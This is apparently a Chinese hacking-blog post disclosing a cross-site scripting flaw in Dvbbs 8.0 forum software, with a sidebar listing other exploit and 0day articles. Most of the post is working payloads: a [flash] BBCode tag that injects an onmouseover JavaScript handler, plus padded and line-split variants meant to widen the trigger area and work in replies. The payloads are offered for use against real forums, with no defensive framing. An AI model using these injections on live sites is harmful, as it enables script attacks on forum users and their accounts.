[组图]动网8.0最新XSS漏洞我们进入一个版块,选择发表新帖子,然后输入[flash]http://" onmouseover=java:alert("leaves") aa="s[/flash],然后发表,弹出窗口了吧。如图3,4所示。 =)
由于要等到把鼠标移到链接上时才能触发XSS语句,所欲这里我们可以把代码变通一下,如:“http://" onmouseover=java:alert("leaves") aa="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss” 这样就能把范围拉大了。还可以这样:
[flash]
http://" onmouseover=java:alert("华夏鸡") aa="s
1
1
1
1
1
1
1
1
1
11
[/flash]
如果要在回复里用分行跨站的话要这样写:
[flash]http://" onmouseover=java:alert("华夏鸡") aa="s
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[/flash]
用分行来跨~!!更加狠毒~~!.....
好了,没什么好说的了,本来不想公布的,但是现在我对网络安全也没什么激情了,就发出来了.....
| 动网8.0最新XSS漏洞 | 10-09 | |
| 检测周杰伦官方网站 | 10-05 | |
| 入侵远古VOD 0day | 10-05 | |
| Discuz!6.0.0注入漏洞 | 09-27 | |
| 动网8.0最新远程注入漏洞来了 | 09-22 | |
| 利用最近热门的Xss漏洞能做什么? | 09-10 | |
| Dz0724补丁补掉的一个xss+补掉的 | 09-04 | |
| 浪人下载和浪人文章的漏洞利用 | 09-01 | |
| XSS跨站脚本及SQL注入漏洞技术分 | 08-27 | |
| 风讯注入0day | 08-25 | |
| 动易2006_SP6最新漏洞得到管理员 | 08-20 | |
| Dvbbs8严重漏洞 | 08-11 | |
您现在的位置: